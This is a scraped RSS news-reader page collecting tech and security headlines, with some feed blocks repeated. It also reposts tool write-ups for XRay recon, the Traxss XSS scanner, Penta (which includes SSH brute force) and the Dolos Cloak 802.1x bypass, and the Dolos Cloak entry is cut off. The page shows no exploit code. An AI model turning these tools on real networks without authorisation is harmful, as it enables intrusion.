News Reader
RSS tabs below. Last time of page update: 2025-11-20 23:47:07 GMT+0 Click Here to refresh the page.
START
Select a tab to begin reading.
Tech RSS feeds
Below are tech sites.
Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses
Taking another leap towards securing users’ digital privacy, Mozilla rolls out Firefox 145 with enhanced…
Mozilla Firefox 145 Rolls Out With Advanced Fingerprint Protection on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Thu, 20 Nov 2025 11:06:54 +0000
Tel Aviv, Israel, 19th November 2025, CyberNewsWire
Seraphic Becomes the First and Only Secure Enterprise Browser Solution to Protect Electron-Based Applications on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Wed, 19 Nov 2025 15:42:51 +0000
If you pay attention to how people communicate now, it’s pretty clear that talking has…
When Language Speaks Faster Than We Can Type: The Rise of Smart Speech-to-Text Tools on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Thu, 13 Nov 2025 17:10:27 +0000
Latest news
Black Friday is a week away, but Amazon's Black Friday sale kicked off today. These are my favorite deals so far, like Govee outdoor lights for $200.
Date of publish: Thu, 20 Nov 2025 21:37:00 GMT
Tuxedo Computers' Infinity Book Pro 14 is a sleek laptop with Linux preinstalled. But its performance is backed up by some smart design choices.
Date of publish: Thu, 20 Nov 2025 21:00:34 GMT
Stop sharing your AirPods when you can directly share your audio instead. Here's how to pair two sets to one device.
Date of publish: Thu, 20 Nov 2025 20:54:00 GMT
NYT > Technology
It is a time of superlatives in the tech industry, with historic profits, stock prices and deal prices. It’s enough to make some people very nervous.
Date of publish: Thu, 20 Nov 2025 23:19:08 +0000
A.I. has added urgency to the U.S. national laboratories that have been sites of cutting-edge scientific research, leading to deals with tech giants like Nvidia to speed up.
Date of publish: Thu, 20 Nov 2025 16:01:51 +0000
Right-wing users have tapped A.I. tools to promote President Trump’s agenda. He took notice.
Date of publish: Thu, 20 Nov 2025 18:40:55 +0000
BleepingComputer
China-linked APT24 hackers have been using a previously undocumented malware called BadAudio in a three-year espionage campaign that recently switched to more sophisticated attack methods. [...]
Date of publish: Thu, 20 Nov 2025 17:12:32 -0500
Data from Italy's national railway operator, the FS Italiane Group, has been exposed after a threat actor breached the organization's IT services provider, Almaviva. [...]
Date of publish: Thu, 20 Nov 2025 13:54:17 -0500
A major spike in malicious scanning against Palo Alto Networks GlobalProtect portals has been detected, starting on November 14, 2025. [...]
Date of publish: Thu, 20 Nov 2025 12:08:55 -0500
Hackers Online Club (HOC)
"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"
Peak the languages that power the web.
With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.
If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.
Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.
Get the lowdown on coding basics
- Review HTML and CSS
- Make sense of JavaScript, jQuery, PHP, and MySQL
- Create code for web and mobile apps
- There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!
Free offer expires 4/22/2020
Date of publish: Mon, 20 Apr 2020 06:25:00 +0000
Smart OSINT Collection of Common IOC (Indicator of compromise) Types
This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.
The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.
Base Collection
For network based IOCs, Mimir gathers basic information including:- Whois
- ASN
- Geolocation
- Reverse DNS
- Passive DNS
- Collection Sources
Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
- PassiveTotal
- VirusTotal
- DomainTools
- OPSWAT
- Google SafeBrowsing
- Shodan
- PulseDive
- CSIRTG
- URLscan
- HpHosts
- Blacklist checks
- Spam blacklist checks
- Risk Scoring
The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.
Machine Learning Predictions
The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.Output
Mimir offers results output in various options including local file reports or exporting the results to an external service.stdout (console output)
normalizes result data, printed with headers and subheaders per module
JSON file
beautified output to local file
Excel
uses multiple sheets per IOC type
MISP
commit new indicators
ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)
Download Smart OSINT Collection
Date of publish: Fri, 31 Jan 2020 09:39:00 +0000
"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".
Understand the nitty-gritty of Cybersecurity with ease
It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.
This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.
Features include how to:
- Align your security knowledge with industry leading concepts and tools
- Acquire required skills and certifications to survive the ever changing market needs
- Learn from industry experts to analyse, implement, and maintain a robust environment
- By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.
Free offer expires on 17 Dec 2019
Offered Free by: Packt
Date of publish: Wed, 04 Dec 2019 06:43:00 +0000
Hacker News: Front Page
Article URL: https://grapheneos.social/@GrapheneOS/115584160910016309
Comments URL: https://news.ycombinator.com/item?id=45999024
Points: 87
# Comments: 36
Date of publish: Thu, 20 Nov 2025 22:56:40 +0000
Article URL: https://adrs-ucb.notion.site/autocomp
Comments URL: https://news.ycombinator.com/item?id=45998649
Points: 35
# Comments: 18
Date of publish: Thu, 20 Nov 2025 22:21:58 +0000
Article URL: https://githut.info/
Comments URL: https://news.ycombinator.com/item?id=45998047
Points: 32
# Comments: 15
Date of publish: Thu, 20 Nov 2025 21:33:37 +0000
Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses
Taking another leap towards securing users’ digital privacy, Mozilla rolls out Firefox 145 with enhanced…
Mozilla Firefox 145 Rolls Out With Advanced Fingerprint Protection on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Thu, 20 Nov 2025 11:06:54 +0000
Tel Aviv, Israel, 19th November 2025, CyberNewsWire
Seraphic Becomes the First and Only Secure Enterprise Browser Solution to Protect Electron-Based Applications on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Wed, 19 Nov 2025 15:42:51 +0000
If you pay attention to how people communicate now, it’s pretty clear that talking has…
When Language Speaks Faster Than We Can Type: The Rise of Smart Speech-to-Text Tools on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Thu, 13 Nov 2025 17:10:27 +0000
Test data management (TDM) is the process of handling and preparing the data used for…
Best Six Test Data Management Tools on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Thu, 13 Nov 2025 16:53:54 +0000
After the recent update, WhatsApp users can experience passkey-secured backups for their conversations. WhatsApp has…
WhatsApp Rolls Out Passkey-Secured Backups On Android, iOS on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Thu, 06 Nov 2025 13:05:53 +0000
Silver Spring, USA/ Maryland, 30th October 2025, CyberNewsWire
Aembit Introduces Identity and Access Management for Agentic AI on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Thu, 30 Oct 2025 12:02:02 +0000
Small security teams are often putting out fires, and as a result, burning out fast.…
How Small Security Teams Can Improve Vulnerability Management on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Wed, 29 Oct 2025 11:13:51 +0000
Microsoft has rolled out a huge Patch Tuesday update bundle for October 2025, addressing 175…
Microsoft October Patch Tuesday Is Huge With 170+ Fixes on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Tue, 28 Oct 2025 10:00:38 +0000
New York, New York, USA, 27th October 2025, CyberNewsWire
nsKnox Launches Adaptive Payment Security™, Revolutionizing B2B Fraud Prevention by Solving the ‘Impossible Triangle’ of Speed, Certainty, and Effort on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Mon, 27 Oct 2025 16:18:46 +0000
Microsoft recently announced changes to the Internet Explorer mode in Edge browsers, citing zero-day exploits…
Microsoft Limits IE Mode In Edge Browser Citing Zero-Day Exploits on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Date of publish: Mon, 27 Oct 2025 11:14:02 +0000
Latest news
Black Friday is a week away, but Amazon's Black Friday sale kicked off today. These are my favorite deals so far, like Govee outdoor lights for $200.
Date of publish: Thu, 20 Nov 2025 21:37:00 GMT
Tuxedo Computers' Infinity Book Pro 14 is a sleek laptop with Linux preinstalled. But its performance is backed up by some smart design choices.
Date of publish: Thu, 20 Nov 2025 21:00:34 GMT
Stop sharing your AirPods when you can directly share your audio instead. Here's how to pair two sets to one device.
Date of publish: Thu, 20 Nov 2025 20:54:00 GMT
OpenAI's new feature enables up to 20 users to collaborate with the chatbot in a single, shared conversation.
Date of publish: Thu, 20 Nov 2025 20:51:00 GMT
Black Friday is just over a week away, and I'm tracking great deals on TVs and home theater equipment from Samsung, Sony, and more live.
Date of publish: Thu, 20 Nov 2025 20:44:00 GMT
Amazon's Kindle Scribe earned our Editor's Choice award for its excellent note-taking features and ease of use. Right now, it's on sale.
Date of publish: Thu, 20 Nov 2025 20:42:00 GMT
Pebblebee's Clip 5 finder tag attaches to a keyring, works with iOS and Android, and gets loud.
Date of publish: Thu, 20 Nov 2025 20:40:00 GMT
A few taps and a swipe are all it takes to make your Android phone run in double time - sort of.
Date of publish: Thu, 20 Nov 2025 20:36:00 GMT
The original Nano Banana generator went viral, and this one is even better. See what changed - and how to try it for free.
Date of publish: Thu, 20 Nov 2025 20:28:34 GMT
Remember when social media was fun and exciting?
Date of publish: Thu, 20 Nov 2025 20:18:00 GMT
Forget the bare minimum: here's how much RAM you actually need to get the best performance out of your Linux system today.
Date of publish: Thu, 20 Nov 2025 20:00:38 GMT
Linux's leader, Linus Torvalds, and his friend, Dirk Hohndel, discuss AI, Rust, and Linux's human side.
Date of publish: Thu, 20 Nov 2025 20:00:00 GMT
New Chromebooks will come with the GeForce Now Fast Pass for a full year, alongside upgrades with the Blackwell RTX architecture.
Date of publish: Thu, 20 Nov 2025 19:57:00 GMT
If you're ordering gifts from Amazon this holiday season, beware of this feature change.
Date of publish: Thu, 20 Nov 2025 19:52:00 GMT
We're keeping a close eye on the best early Black Friday Kindle deals, including discounts on the Colorsoft and the Kindle Scribe.
Date of publish: Thu, 20 Nov 2025 19:32:06 GMT
Sure, using the Linux command line is optional. But these are commands I rely on every day, and you can benefit from them, too.
Date of publish: Thu, 20 Nov 2025 19:30:32 GMT
The Bose QuietComfort Ultra 2 headphones are built for travel, thanks to a warm sound profile, a comfortable design, and an auto standby power feature.
Date of publish: Thu, 20 Nov 2025 19:27:08 GMT
I've used the Roku Streaming Stick Plus for months, and it's a downright steal with this $19 Black Friday deal.
Date of publish: Thu, 20 Nov 2025 19:21:07 GMT
Best Buy's Black Friday sale starts today, and these are my favorite deals available now, like the AirPods Pro 3 for $219.
Date of publish: Thu, 20 Nov 2025 18:56:12 GMT
Shop these early Black Friday deals on last year's Apple Watch models and new models, including the new Series 11and SE 3, a week before the big deals event.
Date of publish: Thu, 20 Nov 2025 18:43:48 GMT
NYT > Technology
It is a time of superlatives in the tech industry, with historic profits, stock prices and deal prices. It’s enough to make some people very nervous.
Date of publish: Thu, 20 Nov 2025 23:19:08 +0000
A.I. has added urgency to the U.S. national laboratories that have been sites of cutting-edge scientific research, leading to deals with tech giants like Nvidia to speed up.
Date of publish: Thu, 20 Nov 2025 16:01:51 +0000
Right-wing users have tapped A.I. tools to promote President Trump’s agenda. He took notice.
Date of publish: Thu, 20 Nov 2025 18:40:55 +0000
Howard Lutnick is helping push data center projects. His family companies are profiting from them.
Date of publish: Thu, 20 Nov 2025 10:00:45 +0000
Dr. LeCun’s departure follows a shake-up in Meta’s artificial intelligence efforts, as Mark Zuckerberg pushes his company to keep up in the tech race.
Date of publish: Wed, 19 Nov 2025 23:35:50 +0000
The company, which makes the computer chips essential to the artificial intelligence boom, also said revenue in its recent quarter rose to $57 billion.
Date of publish: Thu, 20 Nov 2025 00:01:33 +0000
Mr. Musk’s xAI will work with the Saudi artificial intelligence company Humain on a new data center, part of Crown Prince Mohammed bin Salman’s effort to diversify his kingdom’s economy.
Date of publish: Wed, 19 Nov 2025 22:02:37 +0000
Mr. Summers departed the artificial intelligence company’s board after revelations of his communications with the disgraced financier Jeffrey Epstein.
Date of publish: Wed, 19 Nov 2025 19:57:35 +0000
Uncertainty over the availability of the company’s chips, which are used in cars and electronics, had added to concerns of a global shortage.
Date of publish: Wed, 19 Nov 2025 14:10:28 +0000
Over the last 10 months, President Trump has become close with Jensen Huang, Nvidia’s chief executive, as the company’s chips have become a tool in trade and peace talks.
Date of publish: Wed, 19 Nov 2025 14:17:10 +0000
The Pennsylvania site, shorthand for the dangers of nuclear power after a 1979 meltdown, is set for revival under a deal to power Microsoft data centers.
Date of publish: Wed, 19 Nov 2025 10:50:41 +0000
European chipmakers need TSMC’s help to grow their own semiconductor supply chain, but the chip giant’s Taiwanese suppliers find Europe a tough place to do business.
Date of publish: Wed, 19 Nov 2025 16:39:40 +0000
Although some Silicon Valley executives paint China as the enemy, Chinese brains continue to play a major role in U.S. research.
Date of publish: Thu, 20 Nov 2025 03:02:58 +0000
A tribally owned network of chargers will soon be complete, connecting reservations and bridging a gap in the Midwest.
Date of publish: Wed, 19 Nov 2025 02:20:32 +0000
Silicon Valley has increasingly pointed at rapid digital changes to blunt government efforts to rein in its power.
Date of publish: Thu, 20 Nov 2025 22:08:30 +0000
To avoid regulatory scrutiny, big tech companies had steered clear of buying start-ups outright. Meta’s antitrust win may change that thinking.
Date of publish: Wed, 19 Nov 2025 02:08:32 +0000
Meta’s acquisitions of Instagram and WhatsApp did not illegally stifle competition in social networking, a judge found, a major win for the tech giant.
Date of publish: Tue, 18 Nov 2025 20:39:24 +0000
The new artificial intelligence model is the second the company has released this year. OpenAI and Anthropic made similar updates a few months ago.
Date of publish: Tue, 18 Nov 2025 16:29:36 +0000
Maybe more than other model releases, this one seems to have the attention of Google’s competitors. Will it put the company at the top of the A.I. leaderboard?
Date of publish: Tue, 18 Nov 2025 16:03:59 +0000
With the arrival of Amazon’s Zoox robot taxi in San Francisco to compete with Waymo, autonomous services are gaining momentum. But there are pros and cons.
Date of publish: Tue, 18 Nov 2025 14:00:15 +0000
A combination of technological developments and market forces is undermining the trust between viewer and filmmaker. What’s at stake is history itself.
Date of publish: Tue, 18 Nov 2025 14:34:15 +0000
European policymakers are crafting changes to scale back and simplify landmark rules for A.I. and data privacy, in a shift from an aggressive regulatory period.
Date of publish: Mon, 17 Nov 2025 15:49:31 +0000
Scientists used tiny new sensors to follow the insects on journeys that take thousands of miles to their winter colonies in Mexico.
Date of publish: Mon, 17 Nov 2025 22:23:22 +0000
Called Project Prometheus, the company is focusing on artificial intelligence for the engineering and manufacturing of computers, automobiles and spacecraft.
Date of publish: Mon, 17 Nov 2025 19:03:53 +0000
The kiosks, which resemble conventional A.T.M.s and convert cash into virtual currencies, are increasingly under scrutiny as a tool for scammers.
Date of publish: Mon, 17 Nov 2025 05:01:20 +0000
As President Trump has championed crypto and the industry has gone mainstream, funds from scammers and other criminal groups have flowed onto major crypto exchanges.
Date of publish: Mon, 17 Nov 2025 17:05:33 +0000
Endorsements from The Stranger have become a must-have for some politicians, who know to bring snacks to their meetings with the paper’s writers.
Date of publish: Wed, 19 Nov 2025 20:16:54 +0000
Apple joined Google this week in allowing travelers to add their passports to their cellphone “wallets.” As the holiday travel season nears, here’s what you need to know.
Date of publish: Fri, 14 Nov 2025 17:57:17 +0000
Decades after their founders connected, Apple and Issey Miyake released a collection of phone pouches that have some people baffled. They hope it will inspire creativity.
Date of publish: Fri, 14 Nov 2025 13:30:06 +0000
“As you may have noticed, it is not easy to build data centers here on Earth.”
Date of publish: Fri, 14 Nov 2025 12:00:03 +0000
The ESCAPADE mission, which launched to space on a Blue Origin rocket on Thursday, breaks the mold of how planetary science missions typically come together.
Date of publish: Fri, 14 Nov 2025 17:13:07 +0000
BleepingComputer
China-linked APT24 hackers have been using a previously undocumented malware called BadAudio in a three-year espionage campaign that recently switched to more sophisticated attack methods. [...]
Date of publish: Thu, 20 Nov 2025 17:12:32 -0500
Data from Italy's national railway operator, the FS Italiane Group, has been exposed after a threat actor breached the organization's IT services provider, Almaviva. [...]
Date of publish: Thu, 20 Nov 2025 13:54:17 -0500
A major spike in malicious scanning against Palo Alto Networks GlobalProtect portals has been detected, starting on November 14, 2025. [...]
Date of publish: Thu, 20 Nov 2025 12:08:55 -0500
Salesforce says it revoked refresh tokens linked to Gainsight-published applications while investigating a new wave of data theft attacks targeting customers. [...]
Date of publish: Thu, 20 Nov 2025 11:47:20 -0500
American cybersecurity company SonicWall urged customers today to patch a high-severity SonicOS SSLVPN security flaw that can allow attackers to crash vulnerable firewalls. [...]
Date of publish: Thu, 20 Nov 2025 10:56:00 -0500
D-Link is warning of three remotely exploitable command execution vulnerabilities that affect all models and hardware revisions of its DIR-878 router, which has reached end-of-service but is still available in several markets. [...]
Date of publish: Thu, 20 Nov 2025 10:38:56 -0500
Windows 11 migration is inevitable as Windows 10 support ends, and unsupported systems create major security and ransomware risks. Acronis explains how to use this migration to review backups, strengthen cybersecurity, and ensure data stays recoverable. [...]
Date of publish: Thu, 20 Nov 2025 10:05:15 -0500
Photocall, a TV piracy streaming platform with over 26 million users annually, has ceased operations following a joint investigation by the Alliance for Creativity and Entertainment (ACE) and DAZN. [...]
Date of publish: Thu, 20 Nov 2025 08:31:43 -0500
The founders of the Samourai Wallet (Samourai) cryptocurrency mixing service have been sent to prison for helping criminals launder over $237 million. [...]
Date of publish: Thu, 20 Nov 2025 05:49:37 -0500
A new Android banking trojan named Sturnus can capture communication from end-to-end encrypted messaging platforms like Signal, WhatsApp, and Telegram, as well as take complete control of the device. [...]
Date of publish: Thu, 20 Nov 2025 05:00:00 -0500
OpenAI has started rolling out GPT 5.1-Codex-Max on Codex with a better performance on coding tasks. [...]
Date of publish: Wed, 19 Nov 2025 19:00:00 -0500
Sneaky2FA, a popular among cybercriminals phishing-as-a-service (PhaaS) kit, has added Browser-in-the-Browser (BitB) capabilities, giving "customers" the option to launch highly deceptive attacks. [...]
Date of publish: Wed, 19 Nov 2025 16:59:46 -0500
Google's Gemini 3 is finally here, and we're impressed with the results, but it still does not adhere to my requests as well as Claude Code. [...]
Date of publish: Wed, 19 Nov 2025 15:39:28 -0500
Hackers Online Club (HOC)
"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"
Peak the languages that power the web.
With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.
If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.
Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.
Get the lowdown on coding basics
- Review HTML and CSS
- Make sense of JavaScript, jQuery, PHP, and MySQL
- Create code for web and mobile apps
- There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!
Free offer expires 4/22/2020
Date of publish: Mon, 20 Apr 2020 06:25:00 +0000
Smart OSINT Collection of Common IOC (Indicator of compromise) Types
This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.
The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.
Base Collection
For network based IOCs, Mimir gathers basic information including:- Whois
- ASN
- Geolocation
- Reverse DNS
- Passive DNS
- Collection Sources
Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
- PassiveTotal
- VirusTotal
- DomainTools
- OPSWAT
- Google SafeBrowsing
- Shodan
- PulseDive
- CSIRTG
- URLscan
- HpHosts
- Blacklist checks
- Spam blacklist checks
- Risk Scoring
The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.
Machine Learning Predictions
The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.Output
Mimir offers results output in various options including local file reports or exporting the results to an external service.stdout (console output)
normalizes result data, printed with headers and subheaders per module
JSON file
beautified output to local file
Excel
uses multiple sheets per IOC type
MISP
commit new indicators
ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)
Download Smart OSINT Collection
Date of publish: Fri, 31 Jan 2020 09:39:00 +0000
"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".
Understand the nitty-gritty of Cybersecurity with ease
It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.
This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.
Features include how to:
- Align your security knowledge with industry leading concepts and tools
- Acquire required skills and certifications to survive the ever changing market needs
- Learn from industry experts to analyse, implement, and maintain a robust environment
- By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.
Free offer expires on 17 Dec 2019
Offered Free by: Packt
Date of publish: Wed, 04 Dec 2019 06:43:00 +0000
"Best Practices for Protecting Against Phishing, Ransomware and Email Fraud"
Download the Osterman Research Whitepaper, Best Practices for Protecting Against Phishing, Ransomware and Email Fraud, and learn ten best practices you should consider to better protect your systems and network, train your users to be security-aware, and safeguard your organization’s sensitive and confidential data from phishing attacks, ransomware, and CEO Fraud.
Date of publish: Mon, 25 Nov 2019 07:46:00 +0000
XRay is a software for recon, mapping and OSINT gathering from public networks.
XRay for network OSINT gathering, its goal is to make some of the initial tasks of information gathering and network mapping automatic.
How Does it Work?
XRay is a very simple tool, it works this way:- It'll bruteforce subdomains using a wordlist and DNS requests.
- For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.
- If a ViewDNS API key is provided, for every subdomain historical data will be collected.
- For every unique IP address, and for every open port, it'll launch specific banner grabbers and info collectors.
- Eventually the data is presented to the user on the web ui.
Grabbers and Collectors
- HTTP Server, X-Powered-By and Location headers.
- HTTP and HTTPS robots.txt disallowed entries.
- HTTPS certificates chain ( with recursive subdomain grabbing from CN and Alt Names ).
- HTML title tag.
- DNS version.bind. and hostname.bind. records.
- MySQL, SMTP, FTP, SSH, POP and IRC banners.
Notes
Shodan API KeyThe shodan.io API key parameter ( -shodan-key KEY ) is optional, however if not specified, no service fingerprinting will be performed and a lot less information will be shown (basically it just gonna be DNS subdomain enumeration).
ViewDNS API Key
If a ViewDNS API key parameter ( -viewdns-key KEY ) is passed, domain historical data will also be retrieved.
Anonymity and Legal Issues
The software will rely on your main DNS resolver in order to enumerate subdomains, also, several connections might be directly established from your host to the computers of the network you're scanning in order to grab banners from open ports. Technically, you're just connecting to public addresses with open ports (and there's no port scanning involved, as such information is grabbed indirectly using Shodan API), but you know, someone might not like such behaviour.
Building a Docker image
To build a Docker image with the latest version of XRay:git clone https://github.com/evilsocket/xray.git
cd xray
docker build -t xraydocker .
Once built, XRay can be started within a Docker container using the following:
docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com
Manual Compilation
Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH.Then:
go get github.com/evilsocket/xray
cd $GOPATH/src/github.com/evilsocket/xray/
make
You'll find the executable in the build folder.
Usage
Usage: xray -shodan-key YOUR_SHODAN_API_KEY -domain TARGET_DOMAINOptions:
-address string
IP address to bind the web ui server to. (default "127.0.0.1")
-consumers int
Number of concurrent consumers to use for subdomain enumeration. (default 16)
-domain string
Base domain to start enumeration from.
-port int
TCP port to bind the web ui server to. (default 8080)
-preserve-domain
Do not remove subdomain from the provided domain name.
-session string
Session file name. (default "<domain-name>-xray-session.json")
-shodan-key string
Shodan API key.
-viewdns-key string
ViewDNS API key.
-wordlist string
Wordlist file to use for enumeration. (default "wordlists/default.lst")
Example:
# xray -shodan-key yadayadayadapicaboo... -viewdns-key foobarsomethingsomething... -domain fbi.gov
____ ___
\ \/ /
\ RAY v 1.0.0b
/ by Simone 'evilsocket' Margaritelli
/___/\ \
\_/
@ Saving session to fbi.gov-xray-session.json
@ Web UI running on http://127.0.0.1:8080/
Download XRay
Date of publish: Mon, 11 Nov 2019 09:53:00 +0000
"Hacking for Dummies, 6th Edition ($29.99 Value) Free for a Limited Time"
Stop hackers before they hack you!
In order to outsmart a would-be hacker, you need to get into the hacker’s mindset and with this book, thinking like a bad guy has never been easier. Get expert knowledge on penetration testing, vulnerability assessments, security best practices, and ethical hacking that is essential in order to stop a hacker in their tracks.
This no-nonsense book helps you learn how to recognize the vulnerabilities in your systems so you can safeguard them more diligently—with confidence and ease.
- Get up to speed on Windows 10 hacks
- Learn about the latest mobile computing hacks
- Get free testing tools
- Find out about new system updates and improvements
- There’s no such thing as being too safe — and this resourceful guide helps ensure you’re protected.
Free offer expires 10/15/19
Offered Free by: Wiley
Date of publish: Mon, 14 Oct 2019 14:22:00 +0000
- Automated Vulnerability Scanner for XSS
- Written in Python3
Traxss is an automated framework to scan URLs and webpages for XSS Vulnerabilities. It includes over 575 Payloads to test with and multiple options for robustness of tests.
Getting Started
PrerequisitesTraxss depends on Chromedriver. On MacOS this can be installed with the homebrew command:
brew install cask chromedriver
Alternatively, find a version for other operating systems here: https://sites.google.com/a/chromium.org/chromedriver/downloads
Installation
Run the command:pip3 install -r requirements.txt
Running Traxss
Traxx can be started with the command:
python3 traxss.py
This will launch an interactive CLI to guide you through the process.
Types of Scans
Full Scan with HTMLUses a query scan with 575+ payloads and attempts to find XSS vulnerabilities by passing parameters through the URL. It will also render the HTML and attempt to find manual XSS Vulnerablities (this feature is still in beta).
Full Scan w/o HTML
This scan will run the query scan only.Fast Scan w/o HTML
This scan is the same as the full w/ HTML but it will only use 7 attack vectors rather than the 575+ vectors.Fast Scan w/o HTML
This scan is the same as the fast w/o HTML but it will only use 7 attack vectors rather than the 575+ vectors.Contributing
Thank you for your interest! All types of contributions are welcome.- Fork and clone this repository
- Create your branch from the master branch
- Please open your PR with the master branch as the base
Download TraXSS
Date of publish: Mon, 14 Oct 2019 08:28:00 +0000
Penta (PENTest + Automation tool) is Pentest automation tool using Python3.
Installation
Install requirementspenta requires the following packages.
- Python3.7
- pipenv
Resolve python package dependency.
$ pipenv install
If you dislike pipenv..
$ pip install -r requirements.txt
Usage
$ pipenv run start <options>If you dislike pipenv...
$ python penta/penta.py
Usage: List options
$ pipenv run start -h
usage: penta.py [-h] [-target TARGET] [-ports PORTS] [-proxy PROXY]
Penta is Pentest automation tool.
optional arguments:
- -h, --help show this help message and exit
- -target TARGET Specify target IP / domain
- -ports PORTS Please, specify the target port(s) separated by comma.
- Default: 21,22,25,80,110,443,8080
- -proxy PROXY Proxy[IP:PORT]
Usage: Main menu
[ ] === MENU LIST =================================
[0] EXIT
[1] Port scanning Default: 21,22,25,80,110,443,8080
[2] Nmap & vuln scanning
[3] Check HTTP option methods
[4] Grab DNS server info
[5] Shodan host search
[6] FTP connect with anonymous
[7] SSH connect with Brute Force
[99] Change target host
1. Port scanning
To check ports for a target. Log output supported.
2. Nmap
To check ports by additional means using nmap
3. Check HTTP option methods
To check the methods (e.g. GET,POST) for a target.
4. Grab DNS server info
To show the info about DNS server.
Shodan host search To collect host service info from Shodan.
Request Shodan API key to enable the feature.
FTP connect with anonymous To check if it has anonymous access activated in port 21. FTP users can authenticate themselves using the plain text sign-in protocol (Typically username and password format), but they can connect anonymously if the server is configured to allow it.
Anyone can log in to the server if the administrator has allowed an FTP connection with an anonymous login.
SSH connect with Brute Force To check ssh connection to scan with Brute Force. Dictionary data is in data/dict.
Download Now
Date of publish: Thu, 10 Oct 2019 18:57:00 +0000
Dolos Cloak- Automated 802.1x Bypass
Dolos Cloak is a python script designed to help network penetration testers and red teamers bypass 802.1x solutions by using an advanced man-in-the-middle attack.
The script is able to piggyback on the wired connection of a victim device that is already allowed on the target network without kicking the victim device off the network. It was designed to run on an Odroid C2 running Kali ARM and requires two external USB ethernet dongles. It should be possible to run the script on other hardware and distros but it has only been tested on an Odroid C2 thus far.
How it Works
